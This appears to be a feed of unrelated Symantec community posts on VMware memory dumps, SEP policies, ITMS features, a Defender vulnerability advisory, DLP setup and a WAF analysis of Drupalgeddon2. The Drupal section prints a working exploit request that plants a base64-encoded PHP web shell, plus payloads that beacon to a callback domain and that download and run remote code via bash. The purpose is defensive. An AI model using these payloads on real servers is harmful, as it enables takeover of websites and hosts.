En primer lugar, descargaremos los archivos localmente en una máquina , en este caso Windows 7 y más adelante, usaremos la herramienta vmss2core localmente para convertirla a un archivo .DMP

1) Descargue e instale la herramienta vmss2core:

1.1 Navegue a https://labs.vmware.com/flings/vmss2core

1.2 En el lado izquierdo, marque "He leído y estoy de acuerdo con la Vista previa técnica", seleccione vmsscore-vmss2core-sb-8456865 y haga clic en el botón Descargar.

1.3 Copie el archivo vmsscore-vmss2core-sb-8456865.exe descargado en la carpeta de Windows del cliente o simplemente para usarlo, debe navegar desde la línea de cmd(Símbolo del sistema) hasta la ruta donde se guarda. Lo utilizaremos luego , a partir del  punto 5.

IMPORTANTE: PREVIO A SEGUIR LOS SIGUIENTES PASOS, CREE UNA INSTANTÁNEA LIMPIA PARA REVERTIR LA VM MÁS ADELANTE EN CASO NECESARIO, SYMANTEC NO ES RESPONSABLE DE NINGUNA DE SUS ACCIONES Y MENOS REVERTIR EL ESTADO DE UNA MÁQUINA SI NO HIZO UNA INSTANTÁNEA ANTERIORMENTE.

2.) Todo lo que tiene que hacer es reproducir el problema y luego, crear una nueva instantánea (para cada instantánea, se crea un archivo .vmsn (VMware Snapshot) , .vmem (Virtual Memory). estado de la memoria en el momento de la instantánea) y suspender la máquina virtual (.vmss = = VMware Suspended State file - archivo de estado suspendido de VMware).

3) Tendremos que recopilar los archivos : .vmsn, .vmem y los archivos .vmss, ubicados en el almacén de datos(datastore) donde está configurada la máquina virtual.

Para saber en qué almacén de datos se encuentran estos archivos, existen diferentes formas de conocerlo, pero uno de ellos es simplemente seleccionar la máquina virtual en el árbol del navegador en la consola web de vCenter, y navegar a Acciones> y haga clic en Editar configuración ... (Actions> and click in Edit Settings...)

Y haga clic en las opciones de VM y verifique la ubicación de trabajo de la máquina virtual (VM) (VM options> VM Working Location)

Después, simplemente cierre la ventana y vaya a la pestaña de Datastores, seleccione la que tiene en la configuración de la máquina virtual y haga clic en Examinar archivos (Browse Files)

4) Una vez que tenemos los archivos descargados localmente en nuestra máquina con Windows 7.

5) Volveremos al punto 1.3 y abriremos nuestra línea de cmd como administrador y navegaremos donde hemos guardado la herramienta vmss2core:

7) Una vez que estamos en la ruta donde hemos descargado la herramienta vmss2core, ejecutaremos el comando vmss2core-sb-8456865.exe -W "AVR-win7-64-8b80c17a.vmss""AVR-win7-64-8b80c17a.vmem"

NOTA:

Si el sistema invitado es un sistema anterior a Windows 8 / Server 2012, ejecute el comando

"vmss2core -W virtual_machine_name.vmss".

Si el invitado es un sistema Windows 8 / Server 2012 o superior, ejecute el comando

 "vmss2core -W8 virtual_machine_name.vmss".

Si no hay suficiente espacio en disco disponible, ejecute el comando

"vmss2core -WK virtual_machine_name.vmss" para convertir el archivo suspendido de la máquina virtual de VMware en un volcado de memoria del kernel de Windows.

Y comenzará a convertir a DMP en la misma ubicación.

Updated the rules - version 3

I am using this thread to share with you my application control rules which cover most of the malware and ATP detection and protection.

Used in a large healthcare enterprise - 5000+ enndpoints with SEP14

I study how advanced attacks breach organizations and impliment protections agains such attacks using applicaiton control rules as another layer of defence.

Thats a diagram that I have made which is the basis on which I am building my rules

******** You should use this rule as TEST (LOG ONLY) at first - it is important to make all the nessasary exceptiosn for your organization ********

After you get rid of the false positives you have two options:

1) make it production and change all rules to CONTINUE WITH LOGGING

2) Monitor the events to make nessasary false positive exclutions

3) Each rule that has 0 false positives after a week or so - start changing the rules to "block"

Hope it helps you all!!

______________________________________________________________________________________________

First of all this is a known behaviour:

When Email Services are provisioned and before your MX records are changed, Symantec.cloud may process some of your emails. Emails that are sent to your domain(s) by other Email Services customers who are provisioned on the same infrastructure as you are processed. The portal Dashboard and reports may show that email has been received before the MX change.

Step By Step Method to Block/Allow  Android Devices when Connected To Laptop SEP Clients.

We will assume to block all the Samsung Andriod Devices

1. Go to Policies > Policy Components > Hardware Device > Add Hardware Devices

Screen shot  Step 1

2. Go to Application And Device Control > Device Control > Blocked > Add > select the Hardware Device which we have added in step 1

( For Allowing the Device we can Add in Allowed Devices)

Screenshot Step 2

3. If Logs box was checked in Policy ,We can Check its Logs also going to Monitor > Select Application And Device Control then Device Control, it will show al the Logs.

4. Device IDS of All the Brands are attached

Hi

I have tested the Expolit Attacks on Win 10 SEP Clients.

Tested the client by attacking on Network with viruses on win 10 , and it successfully blocked it.

First we have enabled the Intrusion Prevention Policy from SEPM

Then tested the Virus Attack on WIN 7 SEP Client and it successfully blocked it

Security Logs showing Attackers logs

Also From SEPM ,We have generated the Reports.

Detailed Report in excel also generated showing all the information

(Snaps of excel sheet of all columns)

Table Of Contents 

• Application Editor
• BusinessTimeSpan Editor
• Composer Theme Editor
• Credentials Manager
• License Status Manager
• LocalMachineInfo Editor
• Log Viewer
• Messaging Console
• Schedule Editor
• Screen Capture Util
• Server Extensions Configurator
• Task Tray Tool
• ToolPreferences Editor
• Workflow Explorer

Start > Programs > Symantec > Workflow Designer > Tools > ToolPreferences Editor

Workflow Designer preferences refer to the general settings that control how Workflow Designer functions. You can access the Workflow Designer settings in Workflow Manager

Chapter 41 pg620 - User Guide

Symantec Glossary

ToolPreferences Editor
A client tool for Workflow Solution that lets you configure five categories of settings: Studio Configuration, Designer, Debugging, Deployment, and Process Manager.

https://www.symantec.com/security_response/glossary/define.jsp?letter=t&word=tool-preferences-editor

File Location

"[Install Drive]:\Program Files\Symantec\Workflow\Tools\LogicBase.ToolPreferences.Editor.exe"

Screenshots

Studio Configuration

Designer

Debugging

Deployment

Help

Get the most out of your standard SEP installation!

Updated the rules - version 4 - MAY 2018

I am using this thread to share with you my application control rules which cover most of the malware and ATP detection and protection.

Used in a large healthcare enterprise - 5000+ enndpoints with SEP14

I study how advanced attacks breach organizations and impliment protections agains such attacks using applicaiton control rules as another layer of defence.

Thats a diagram that I have made which is the basis on which I am building my rules

******** You should use this rule as TEST (LOG ONLY) at first - it is important to make all the nessasary exceptiosn for your organization ********

After you get rid of the false positives you have two options:

1) make it production and change all rules to CONTINUE WITH LOGGING

2) Monitor the events to make nessasary false positive exclutions

3) Each rule that has 0 false positives after a week or so - start changing the rules to "block"

Hope it helps you all!!

______________________________________________________________________________________________

With the  WF 8.1 RU5 release a new set of  SEP 14 Components were added to the Solution.

If you create a new Project and add the Integration Library "Symantec.Components.SEP14.dll"

[Install Drive]:\Program Files\Symantec\Workflow\Shared\components\Symantec.Components.SEP14.dll

This will then allow you to use the Components within your Process.

4 new Properties will be added to your Project

Update these to values that will work in your environment.

These will show in your Component list under

Symantec | SEP14

There are then a number of sub groups containing Components.

Admin

• Get Admin Accounts List
• Get Admin Details
• Get Admin Details

Clients

• Get Computer List Component
• Move Computer Component

Commands

• Get Command Status Details
• Run Command Base Line
• Run Command Quarantine
• Run Command Update Content

Domain

• Get Domain By Id Component
• Get Domains Component
• Update Domain Component

Group

• Get Group Computers Component
• Get Groups List Component

SEP API Documentation

Symantec Endpoint Protection Manager 14.x REST API Reference
https://support.symantec.com/en_US/article.DOC9447.html

Symantec Endpoint Protection Manager API reference
https://support.symantec.com/en_US/article.HOWTO127961.html

Endpoint Protection 14 REST API and PowerShell
https://support.symantec.com/en_US/article.HOWTO125873.html

There is an online version of the API Docs

https://apidocs.symantec.com/home/saep

Documentation

Configuring SEP 14 components from Workflow Solution

DOC10748 https://support.symantec.com/en_US/article.DOC10748.html

Symantec IT Management Suite 8.1 RU5 powered by Altiris technology Release Notes

http://www.symantec.com/docs/DOC10712

Feature

Workflow support for Symantec Endpoint Protection 14

Description

From this release onwards, Workflow provides limited support for Symantec Endpoint Protection 14 components.

For more information refer to the following article: DOC10748

Advance Protection With SEP 14.1 Cloud bundled with SEP 14MP1 Now.

Below is the step by step method to Log in to SEP Cloud features:

1. Open the SEPM Manager and Click on cloud  then click on Get Started as shown below

then paste the token u got in ur mail and log in to SEP Cloud

then log in to SEP Cloud

if not have account fill the form

next step

u can have then welcome window having all the step by step videos to use SEP 14.1 Cloud Feature, 

This article guides one to install Management Console of Symantec Endpoint Protection Manager (SEPM) v14.0 on a remote client system (Windows).

Pre-requisites

Pre-requisites to install Symantec Endpoint Protection Manager – Management Console are as mentioned below:

• Web Browser - Google Chrome or Mozilla Firefox (Latest Version)
• Java Runtime – Java 8 update 131

Download Java Runtime

Download and install exact version of Java for SEPM Console.

Follow below mentioned steps to download and install.

Step 1:

• Open a Web Browser and enter SEPM Serer IP with port number in address bar.
• https://123.45.67.89:8443

Step 2:

• Entered address will open a web page as displayed below.
• Click on Download Java 8 button on display web page under Symantec Endpoint Protection Manager Console.

Step 3:

• Once clicked on Download Java button, you will be redirected to a web page displayed below.
• Click on Click here to download and install Java 8 Update 131 to download Java Runtime.

Step 4:

• Download will stard once clicked.
• Save Java 8 setup in any directory.

Installation of Java Runtime

Step 1:

• Right Click on jre-8u131-windows-i586.exe file and select Run as administrator.

Step 2:

• On the welcome screen of Java Setup, Click install> button.
• If you want to install Java Runtime in some specific folder, select Change destination folder.
• Once lcicked on install> button, installation process will begin.

Step 3:

• On Java Setup - Complete screen, Click on Close button.

Download SEPM Console Application

Step 1:

• To download SEPM console application, visit below mentioned URL by replacing IP with your Server IP.
• 123.45.67.89:9090/symantec.html
• Click on Click here to download and log in to Symantec Endpoint Protection Manager.

Step 2:

• Click on Keep to continue download SEPM Console Application.
• Once downloaded, keep the setup in any directory.

Install SEPM Console Application

Step 1:

• Once SEPM Console Application is downloaded, Right Click on JnlpServlet and select Launch.
• Setup will get launched.
• Launched setup will start downloading the application.

Step 2:

• Once downloaded successfully, Java dialogue box will pop up on the screen asking whether you want to run Symantec Endpoint Protection Manager or not.
• Click on Run button.

Step 3:

• Click Ok on Information popup to launch SEPM Console.

Symantec Endpoint Protection Manager Console is ready to be used.

Enter User Name and Password to login to SEPM Console.

Download attached file for complete document with screenshots.

Starting in Inventory Solution 8.1 RU6, the features to monitor the health of Symantec Endpoint Protection (SEP), to Start Agent services via a Task, is now available. These features assist in ensuring that your endpoints managed by ITMS are properly protected by gathering inventory data and running reports or viewing dashboards and taking corrective action as needed. This release provides the foundation for later functionality that will intergrate delivering the SEP agent to managed computers.

This functionality is available starting in version 8.1 RU6 of Inventory Solution. Subsequent releases, such as 8.1 RU7 and 8.5 will also contain this functionality. At this time the supported platforms are those supported by ITMS for Windows and Mac computers.

Data Collection

• Inventory Plug-in is required
• Inventory Solution licenses should be available for targeted systems

‘SEP Agent’ checkbox should be selected in Advanced Options of Inventory policy or task

The following data is collected by Inventory Solution for Symantec Endpoint Protection. These 3 data classes provide information that is useful in checking the health and status of your SEP installs.

• SEP Agent – Inv_SEP_Agent – This data existed in previous version but has been extended.
• Installed SEP Agent Details – Inv_Installed_SEP_Agent_Details – This is a new data class
• SEP Agent Service Details – Inv_SEP_Agent_Service_Details – This is a new data class

What new information is collected from target systems

• Current and Preferred SEPM groups
• Device infected or not (not collected on Mac)
• SEP Antivirus protection disabled or enabled (not collected on Mac)
• SEP Firewall protection disabled or enabled (not collected on Mac)
• Date and time of last Antivirus Scan (not collected on Mac)
• Date of Virus definitions that are used by client
• Revision number of Virus definitions that are used by client
• SEP service name
• SEP service status
• SEP startup type (not collected on Mac)
• SEP service last exit code (not collected on Mac)

Computer Details Flipbook

In ITMS, within the Symantec Management Console, when viewing a computer you can use the flipbook dashboard to view the Health fo the SEP agent.

RED – Overall SEP Agent Health is calculated based on statuses of all metrics. Possible values are Healthy, Needs attention, and Untracked.

GREEN – Health status of these metrics is evaluabed based on rules.

BLUE – Health status of these metrics is not evaluated, only displayed.

If no Inventory data is gathered, ‘No data available’ will be displayed. For example on a Mac computer where inventory collection is limited for SEP.

How overall SEP health status is calculated:

Health Evaluation Settings

This page, found in the Symantec Management Console under Settings > All Settings > Integrations > Symantec Endpoint Protection > Settings > SEP Agent Health Evaluation Settings, allows you to set how the health is calculated for SEP running in your environment.

NOTES:

• Infected Status is healthy, if SEP client is not infected
• SEP Agent Service state is healthy, if it is running

NOTE:

• The Applies To section for targets is available when a new custom settings rule is created, but not available for the Default Settings. This allows you to have different settings depending on what systems are targeted. For example Macs may require different settings and would have a different set of rules.

• Custom evaluation settings may be created and targeted to computer groups
  
  • Prevent targeting same computer to different evaluation settings
• Default settings do not have a target and apply to all computers that are not targeted to any of the custom settings
• If settings rule is enabled, SEP status is evaluated (Healthy or Needs attention) on targeted computers according to defined settings
• If settings rule is disabled, SEP status is not evaluated and targeted computers are shown as Untracked
• Settings page are also accessible from Computer Details and Computer Summary ‘SEP Agent Health’ flipbooks

Computer Summary flipbook

This page shows a summary of all computers in the ITMS system relating to SEP health statuses. This is useful for an overall picture of the health of the environment.

Under Jobs and Tasks in the Symantec Management Console a new category named SEP Management is available. This provides a task that can start the SEP Agent service on targeted computers.

NOTE: For 8.1 RU6, the only option is to START the SEP service. Other functionality for the task is forthcoming in subsequent versions. Like any task, a target can be applied to the task. Note that this is a client-side task so it requires the Symantec Management Agent to be installed.

A convenience feature is available that allows you to start the service simply by pushing a start button. This is available from both the SEP Agent Health Computer Summary and Computer Details flipbooks. The Start button only appears on the Computer status if the service is not running, and it will only appear on the Summary if one or more computers have a service not running.

COMPUTER:

SUMMARY:

Good things to know

• In case if the inventory agent is installed on client computer where ‘Control SEP Service State’ task is running, SEP related information will be collected and reported to NS after task start SEP service.
• On Windows clients, in case if by some reason SEP service is disabled, we do not start it and ‘Control SEP Service State’ task fails with return code 4
• In case if task is targeted to computer where SEP service is running, it does nothing.

These are the first steps in providing greater functionality in ITMS (Endpoint Management) for managing the SEP installs in the environment. In an increasingly dangerous cyber environment it is vital to ensure the health of security software used to keep endpoints safe. Future functionality is currently planned to include Software Management capabilities (these include automatic features as SEP can be deployed via Software Management currently, but done manually), service stop and restarts, and possibly additional details captured via inventory as the need arises.

Critical Vulnerability in Microsoft Malware Protection Engine

Description

A vulnerability was reported in Microsoft Windows Defender. A remote user can cause arbitrary code to be executed on the target user’s system.

The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft  Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, 1709 and Windows Server 2016, Windows Server, version 1709, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to remote code execution. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability".

The Exploit

To exploit this vulnerability, a specially crafted file must be scanned by an affected version of the Microsoft Malware Protection Engine. There are many ways that an attacker could place a specially crafted file in a location that is scanned by the Microsoft Malware Protection Engine. For example, an attacker could use a website to deliver a specially crafted file to the victim's system that is scanned when the website is viewed by the user. An attacker could also deliver a specially crafted file via an email message or in an Instant Messenger message that is scanned when the file is opened. In addition, an attacker could take advantage of websites that accept or host user-provided content, to upload a specially crafted file to a shared location that is scanned by the Malware Protection Engine running on the hosting server.

If the affected antimalware software has real-time protection turned on, the Microsoft Malware Protection Engine will scan files automatically, leading to exploitation of the vulnerability when the specially crafted file scanned. If real-time scanning is not enabled, the attacker would need to wait until a scheduled scan occurs in order for the vulnerability to be exploited. All systems running an affected version of antimalware software are primarily at risk.

An attacker who successfully exploited this vulnerability could execute arbitrary code in the security context of the LocalSystem account and take control of the system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

All systems running an affected version of antimalware software are primarily at risk, meaning that users and admins should update immediately to avoid attacks. The attack doesn’t need user interaction because the Microsoft Malware Protection Engine automatically scans all incoming files.

Experts pointed out that Windows Defender is enabled by default on Windows 10.

How Did Microsoft Fix CVE-2018-0986?

Microsoft release a patch to fix the above issue. The patch works by correcting the way Microsoft Malware Protection Engine scans specially crafted files.

How can Symantec help?

Symantec Control Compliance Suite Vulnerability Manager helps you scan all systems to identify endpoints where the vulnerable software version is present, along with automating the patching using the Symantec Endpoint Management Suite.

References

• EXPLOIT-DB:44402
  • https://www.exploit-db.com/exploits/44402/
• CONFIRM:
  • https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2...
• BID:103593
  • http://www.securityfocus.com/bid/103593
• SECTRACK:1040631
  • http://www.securitytracker.com/id/1040631

Software Portal platform detection introduced in ITMS 8.1 RU5

The Software Portal provides users access to software that administrators grant rights to. This software can be selected and installed through the portal. When a user opens the portal, and software granted by the administrator is available. In previous versions this did not take into account what platform the portal was launched from. For example if a Mac system loaded the portal, it would still show all available software including Windows-based applications. In the 8.1 RU5 release it is now possible to configure software so it only appears in the Portal for computer platforms that supports it.

The following sections provide detail on how to configure and use this new feature:

Component Configuration

The first step is configuring Software Releases so they apply to specific platforms. By default not all these associations are automatically added, but may need to be added manually. This can be done as part of the original creation and configuration of the software, or be added later.

The following steps provide a walkthrough of how to edit a component and add the association.

1. In the Symantec Management Console, browse under Manage > Software.
2. Using the views in the upper left-hand pane (common view is Deliverable Software > Software Releases) using the middle pane to find the software you wish to configure.
3. Double-click on the software or right-click and choose Actions > Edit Software Resource.
4. If you are creating a new software resource, this is the point you’d add this configuration item to the initial creation.
5. Click on the Association tab.
6. From the Association Type drop down list, select Applies to Software Platform.
7. Click the Add button.
8. The list in the left pane allows you to choose one of the following supported operating system types:
   
   1. Linux
   2. Mac
   3. Unix
   4. Windows

Click OK to save the added platform settings.

Target Configuration

Another common use-case revolves around distinguishing between 32-bit and 64-bit platforms. The associations do allow Operating Systems to be added, however the Software Portal does not use those associations. Instead, targeting provides the ability to target specific filters of computers. By adding a specific type of computers to the target, you can restrict things like 32-bit or workstations only.

The following process walks through how to set these types of targets:

1. In the Symantec Management Console, browse under Manage > Software.
2. Using the views in the upper left-hand pane (common view is Deliverable Software > Software Releases) using the middle pane to find the software you wish to configure.
3. Double-click on the software or right-click and choose Actions > Edit Software Resource.
4. If you are creating a new software resource, this is the point you’d add this configuration item to the initial creation.
5. Click on the Software Publishing tab.
6. Select the command-line that is published that you wish to change settings on.
7. Click on the option “Change Target”.
8. Select the appropriate target from the left-hand pane and use the arrow key to move it to the right-hand pane.
   
9. Click OK to save the target selection.
10. Click OK to save the Software Resource changes.

Automatic Association

Some associations will be made automatically. Certain file types, when imported, will trigger this to happen. Note that this only happens for the file that is chosen as the Installation File during Import of the Software, as shown in the below screenshot:

For example, if you import an MSI, the Platform Assocation of Windows will already be present for the Software Release. The following file formats are used in this manner:

• Windows
  
  • EXE
  • MSI
• Mac
  
  • PKG
  • APP

Illustrating Functionality

The following walkthrough demonstrates this functionality in use. For this scenario, I’m taking Google Chrome to post to the Portal. The steps are not full, meaning this isn’t a full walkthrough of all steps, but only those applicable to the example of the functionality.

Criteria:

• Make Google Chrome available to all Users.
• Limit Chrome to only workstations and notebooks. No Server-class machines should have Chrome installed.
• Users with server access still need access to Chrome for workstation-notebook Chrome installs. For example on their personal notebooks.

Walkthrough:

1. Import Google Chrome to the Software Catalog.
2. During the import, choose the MSI as the Installation File.
   
3. When asked, choose to Open the new Software Release for editing when finished with the Import.
4. Note that the Properties show the Windows platform association automaticalliy.
   
5. Under the Software Publishing tab, Check the box next to the appropriate command line (i.e. Install for all users with no UI) add All Domain Users as the group and set the radial to Approved.
   
6. Click OK to save the changes.
7. Launch the portal from a Windows workstation and Windows Server. Note that it shows on both, including the Server. Since Any Windows platform is applicable as configured automatically, it will show on server operating systems. The following screenshot is from a Windows Server 2012 system:
   
8. In the Symantec Management Console, browse under Manage > Software.
9. Using the views in the upper left-hand pane select the view Deliverable Software > Software Releases and use the middle pane to find Chrome.
10. Double-click on the software or right-click and choose Actions > Edit Software Resource.
11. Click on the Software Publishing tab.
12. Select the command-line that is published in order to edit the settings on it.
13. Click the Change Target button.
14. Click New > Target.
15. Provide a name for the target, such as: All Non-Server Windows Systems.
16. Click Add rule.
17. Choose next to THEN: Exclude computers in > filter > and click the … button.
18. In the search type windows servers and select Windows Servers from the resulting list, and click OK.
19. If you click Update Results you will see a list of computers that does not include server-class operating systems.
    
20. Click OK to save the new Target. You will see the target now selected in the Select a resource target screen.
    
21. Click OK to save the target selection.
22. Click OK to save the changes made to the Software Release / Resource.
23. Now open the Portal on both a client and server operating system. Note that it will still show on the client Windows versions, but not the Servers. For the following screenshot I used the same Windows Server 2012 system:
    
24. Done!

32-bit and 64-bit Systems

As one last example, this is how you create a filter for only 64-bit systems:

1. In the Symantec Management Console, browse under Manage > Software.
2. Using the views in the upper left-hand pane select the view Deliverable Software > Software Releases and use the middle pane to find Chrome.
3. Double-click on the software or right-click and choose Actions > Edit Software Resource.
4. Click on the Software Publishing tab.
5. Select the command-line that is published in order to edit the settings on it.
6. Click the Change Target button.
7. Click New > Target.
8. Provide a name for the target, such as: All x64 Windows Systems.
9. Click Add rule.
10. Choose next to THEN: Exclude computers not in > filter > and click the … button.
11. In the search type windows x64 and select Windows x64 from the resulting list, and click OK.
12. Click OK to save the new Target. You will see the target now selected in the Select a resource target screen.
13. Click OK to save the target selection.
14. Click OK to save the changes made to the Software Release / Resource.

The same thing can be done for x86 (32-bit) systems thus allowing you to target those specific platform types.

Conclusion

Using these methods, the Portal can now be configured to only show software that is applicable to the user and machine the user is logged onto. This avoids users trying to install software that is not meant for the target system.

Written by:

Shay Berkovich, Sr. Software Development Engineer

Martin Vierula, Sr. Software Development Engineer

Summary

Drupal is a very popular open source Content Management System installed on many webservers. A recently announced patch for Drupal 7.x and 8.x has been released and drew a lot of attention due to the issue criticality. Soon after the patch, various researchers came up with the articles describing the issue and the attack vectors. Not long after that, a working exploit was published on Github. Multiple sources report that the vulnerability is being actively exploited with multiple variations of attack payloads.

The Symantec Web Application Firewall solution leverages a unique Content Nature Detection approach that is able to correctly identify CVE-2018-7600 attacks without requiring a signature update or virtual patch. Symantec Web Application Firewall (WAF) customers are protected by default, and no additional action is required.

Attack

The original research has identified four parameter keys from Drupal FormAPI susceptible to injection. However, currently, only two of the parameters are exploited - “#lazy_builder” and “#post_render”. Note that this vulnerability is aggravated by the lack of authorization required, because the form targeted is the new user registration form. There are several POC attack payloads flooding the web, most of them are collected here. For our analysis we will use the most mature exploit script at this point from here:

Analyzing the traffic with Wireshark shows the HTTP request being issued:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1

Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3

Accept: */*

User-Agent: Ruby

Connection: close

Host: 192.168.233.142

Content-Length: 179

Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOyA/Pg== | base64 -d | tee s.php

Following the reports of exploitation attempts on the internet, there are more payloads identified that are injected through mail[][#markup] form parameter:

ping 192.168.233.142.mu6fea.ceye.io -c 1

echo `whoami`
phpinfo()
echo 123
whoami
touch 1.html
echo "xiokv"

echo KC91c3IvYmluL2N1cmwgLWZzU0wgaHR0c DovL3RjOHpkdy5pZjFqMHl0Z2t5cGEudGsvaSB8 fCAvdXNyL2Jpbi93Z2V0IGh0dHA6Ly90Yzh6 ZHcuaWYxajB5dGdreXBhLnRrL2kgLXFPLSkgfCAvYmluL2Jhc2g= | base64 -d | bash

Mitigation

Let’s deploy the Symantec Web Application Firewall (WAF) and observe how the attack is correctly detected and blocked. Using the “ping” payload and original POC from here, the WAF log for the request shows the Command Injection engine has identified the attack:

404 TCP_NC_MISS POST text/html;%20charset=iso-8859-1 http 10.169.2.157 80 /user/register ?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax - "python-requests/2.18.4"10.169.4.101 474 445 - "Unavailable" - - 506 "10.75.88.230""Unavailable" - 2 10.169.2.157 "unavailable""Command Injection" 30 - "[{""eng"":""injection.command"",""part"":""post_arg"",""host"":""linux"",""version"":""3"",""data"":""ping 10.169.2.157.mu6fea.ceye.io -c 1""},{""eng"":""injection.command"",""part"":""post_arg"",""host"":""windows"",""version"":""3"",""data"":""ping 10.169.2.157.mu6fea.ceye.io -c 1""},{""eng"":""injection.command"",""part"":""post_arg"",""host"":""osx"",""version"":""3"",""data"":""ping 10.169.2.157.mu6fea.ceye.io -c 1""}]" - - WAF_SCANNED

Drupalgeddon2 POC uses a more evolved technique – it first installs a PHP backdoor code in the initial POST request. Once it is deployed, the backdoor will accept and execute any command contained in parameter “c” of the GET requests destined to “s.php” backdoor file. This does not stop Symantec WAF from recognizing the parameter payload as command injection:

404 TCP_NC_MISS POST text/html;%20charset=iso-8859-1 http 10.169.2.157 80 /user/register ?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax - "Ruby"10.169.4.101 469 506 - "Unavailable" - - 506 "10.75.88.230""Unavailable" - 1 10.169.2.157 "unavailable""Command Injection" 10 - "[{""eng"":""injection.command"",""part"":""post_arg"",""host"":""linux"",""version"":""3"",""data"":""echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOyA\/Pg== | base64 -d | tee s.php""}]" - - WAF_SCANNED

The authors are using a well-known obfuscation technique to hide the PHP code in base64-encoded string. Note that even if this technique is not used, WAF would block the PHP plaintext payload, albeit with the different Code Injection engine.

The important aspect is that Symantec WAF detected and blocked this attack without requiring a signature update. In a way, this is similar to how Metasploit decouples exploits and payloads – if the exploit is built right, one can bundle it with multiple payloads.

SYMC WAF Protection

The Symantec Web Application Firewall uses Content Nature Detection engines, which satisfy the need for strong detection capabilities in a scalable system capable of handling Enterprise-grade traffic profiles. It is a fundamental shift away from "known bad" pattern matching, and is instead based on understanding the nature of the content and how backend infrastructure components handle data.

As demonstrated, the payloads and the vector of attacks even within the same vulnerability may vary. In the case of this particular vulnerability the payload syntax is only limited by attacker’s imagination and knowledge of the programming languages and shell commands (i.e. PHP stager and bash command injection). Consider, for example, new POC may be issued tomorrow that exploits different parameter key #lazy_builder. Therefore, the patch / rule deployed by the traditional WAFs must be general enough to cover not just all vectors, but also all potential payloads. This approach, off course, is prone to a great deal of False Positives.

The Symantec WAF addresses inherent flaws in the traditional signature-based pattern matching approach. The payloads for CVE-2018-7600 are blocked by default, without requiring a signature update or virtual patch. This greatly reduces the operational overhead associated with type of vulnerability. Symantec WAF customers were also protected before this vulnerability was publically disclosed.  

Conclusion

Drupal Security team has strongly advised to upgrade vulnerable Drupal versions to the appropriate patched versions (7.58 for Drupal 7.x and 8.5.1 for Drupal 8.x).

Symantec WAF customers are protected by default, and do not require a signature update or virtual patch for protection.

Existing ProxySG customers who are not running WAF controls can deploy a virtual patch in policy for immediate protection. For example:

define condition drupal_cve-2018-7600

    http.request[query_arg_name,post_arg_name].regex="(^#|\[[\x22\x27]?#.*\])"

end

<proxy> condition=drupal_cve-2018-7600

force_exception(invalid_request)

; ProxySG 6.6+

<proxy>

http.request.normalization.default("urlDecode:(path),urlDecode:(header),urlDecode:urlDecode:htmlEntityDecode:(arg_name,arg)")

Note that this solution should be regarded as less robust than using ProxySG WAF controls.

Although Symantec WAF customers are protected by default, any that are facing delays in upgrading Drupal to a safe version would be prudent to add a similar virtual patch for defense in depth.

Note that this solution should be regarded as less robust than using ProxySG WAF controls.

Although Symantec WAF customers are protected by default, any that are facing delays in upgrading Drupal to a safe version would be prudent to add a similar virtual patch for defense in depth.

References

[1] https://www.drupal.org/sa-core-2018-002

[2] https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py

[3] https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708

[4] https://github.com/dreadlocked/Drupalgeddon2

[3] https://research.checkpoint.com/uncovering-drupalgeddon-2/

[4] https://isc.sans.edu/diary/rss/23549

Setting up of 3 Tier DLP

**Please note that enforce is not supported on Centos and this was used for trial purposes. If you wish to use Centos in your live environment then this is at your own risk**

Environment –

Windows server 2012 64-bit

Centos 6.5

WinSCP – Free file transfer utility

Mobaxterm  - Used for SSH into clients and this also uses a built in Xterm. Ensure to configure Xterm to use 256 colours

Setting up Oracle Database on Windows for DLP

1. Install Oracle Database on windows platform using the Oracle_12.2.0.1.0_Server_Win64_1of2 & 2of2 files
2. Extract Both files (these files need extracting twice) E:\temp\database
3. After extracting file 2of2 copy the contents of database\stage\Components into the following - win64_12.2.0.1_database_1of2\database\stage\Components (THIS IS IMPORTANT AS THE SETUP WILL NOT WORK).
4. Extract 12.2.0.1_64_bit_Installation_Tools.zip to E:\temp\tools
5. Once you have completed the above steps you will need to run the following command as Administrator in command prompt and assuming your files are strored in the E: directory E:\temp\Oracle\database\setup.exe -noconfig -responsefile E:\temp\Oracle\tools\responsefiles\Oracle_12.1.0.2_Installation_WIN.rsp  Follow the oracle setup using the following guide https://symwisedownload.symantec.com//resources/sites/SYMWISE/content/live/DOCUMENTATION/9000/DOC9257/en_US/Symantec_DLP_15.0_Install_Guide_Win.pdf?__gda__=1523576506_fba9d902ef1488de6dda24316c082f4e

Centos Oracle Client install

1. Log into the server as root and run ‘yum update’
2. Install nano using ‘yum install nano’
3. Edit the ‘Selinux’ file ‘nano /etc/sysconfig/selinux’ – Edit the line that says SELINUX=enforced to SELINUX=disabled – Exit and save the file ‘ctrl+c’ followed by ‘y’
4. Reboot the server
5. Log back into the server using root
6. Install all dependencies  -  ‘yum install -y  apr apr-util binutils compat-libstdc++-33 expat libicu Xorg-x11 compat-openldap compat-db47 libpng12 compat-libtiff3 wireshark gcc cpp compat-libstdc++-296 compat-libstdc++-33 glibc-devel emacs Xorg-X11-Auth’
7. Reboot the server and login using root
8. Run the following command ‘service firewalld off’ **This turns off the system firewall** you can check the status of the Firewall by using the command ‘service firewalld status’
9. Using WinScp connect to your Centos instance. Navigate to ‘/<root> then double click opt. create a folder called temp
10. Navigate back to the opt folder and from within WinSCP right click on the fold and click ‘properties’ check the box Set group, owner and permissions recursively, followed by clicking the ‘ok’ button.
11. On your pc navigate to the required files – (If you can, unzip the media before you upload) copy and paste the files into the temp folder
12. Once the files have finished uploading execute the following command ‘sudo -u oracle /opt/temp/client/runInstaller -noconfig -responseFile /opt/temp/client/response/client_install.rsp’
